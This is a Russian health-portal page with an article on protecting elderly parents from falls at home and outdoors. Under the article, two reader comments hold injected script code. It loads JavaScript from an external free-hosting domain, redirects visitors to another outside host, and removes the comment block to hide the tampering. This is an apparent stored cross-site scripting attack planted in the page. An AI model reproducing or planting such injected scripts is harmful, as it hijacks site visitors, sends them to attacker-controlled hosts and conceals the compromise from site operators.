Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Спасите своих пожилых род...  >>  Спасите своих пожилых родителей. Как не упасть
 
Обратная связь
 

Спасите своих пожилых родителей. Как не упасть

Размер шрифта
12 сентября 2012 00:00
Юрий Малышев
Здоровье инфо
Екатерина Кузнецова
Здоровье инфо
  • google_analytics: false
  • Нравится

С возрастом кости становятся не такими прочными, поэтому повышается риск переломов даже от незначительных травм или падений. Как обезопасить пожилых людей на улице и дома?

Берегите родителей

Безопасность дома

Подберите правильную обувь для дома
Если вы или ваши пожилые родственники ходите по дому босиком или в носках, то это лишь увеличивает риск падений, поэтому следует носить обувь даже в помещении.

Выбирайте обувь с низкими каблуками и нескользкой подошвой. Убедитесь, что обувь подходит по размеру и не жмет. Вовремя заменяйте обувь, которая растянулась или пришла в негодность.

Содержите дом в порядке
Расставьте мебель так, чтобы всем было легко передвигаться по дому. Не засоряйте дом коробками, газетами или другими ненужными вещами. Обязательно убедитесь, что электрические провода хорошо укреплены и не болтаются под ногами.

Используйте приспособления для повышения безопасности
Установите поручни и положите резиновые коврики в ванной. В частном доме обязательно по обеим сторонам лестницы должны быть поручни. Убедитесь, что все коврики в доме имеют основу, которая не скользит.

Будьте осторожнее с домашними животными
Собаки и кошки скрашивают одиночество, но они очень часто путаются под ногами. Не позволяйте домашним животным спать там, где обычно пролегает ваш путь, а также около кровати или кресла, в которых отдыхают пожилые родители.

Безопасность на улице

Смотрите, куда наступаете
Наивысшего внимания требует передвижение пожилых людей по полу с мраморным или плиточным скользким покрытием. Нужно обращать внимание на неровные поверхности, бордюры и двери с высокими порожками.

Не торопитесь
Старайтесь никогда не торопиться ни дома, ни на улице. Большинство несчастных случаев происходит именно тогда, когда вы торопитесь.

Общие советы

Предотвращение падений
Очень полезны ходьба и плавание, также можно выполнять ряд упражнений, которые улучшают общее состояние мышц, гиб­кость и равновесие. Это поможет крепко стоять на ногах.

Проконсультируйтесь с врачом
Многие лекарства способны вызывать сонливость или головокружение. Если вы или ваши пожилые родители принимаете какие-то лекарства, то проконсультируйтесь с врачом, тем более, если у вас наблюдается один из выше упомянутых симптомов. Врач откорректирует ваше лечение.

Избегайте алкоголя
Это не удивительно, что употребление алкоголя может привести к падениям. Также оно  вредит здоровью костей, т.к. алкоголь способствует вымыванию кальция, что делает кости более хрупкими.

Вместо алкогольных напитков отдавайте предпочтение богатому кальцием молоку, а также свежевыжатым сокам ​​или нежирному йогурту.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Ученые знают, сколько вы проживете   Старческие болезни больше не страшны   Факторы риска старческого слабоумия   Как добавить 20 лет к жизни  
30 апреля 2013Нужны ли бабушке социальные сети? Оказывается, они улучшат ее умственные способности! 01 марта 2013Почему пожилые люди так часто становятся жертвами мошенников
 
12 ноября 2012Старческие болезни больше не страшны 14 января 2013Ученые изобрели лекарство для лечения старческого слабоумия
 

Слайдшоу

1
Вы проживете до 100 лет, если ответите «да» на эти вопросы
Позаботьтесь о будущем: еда против старости
Супереда против старения

Тесты

Как быстро вы стареете
Есть ли у вас варикозное расширение вен?
Что вы знаете о мышцах?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.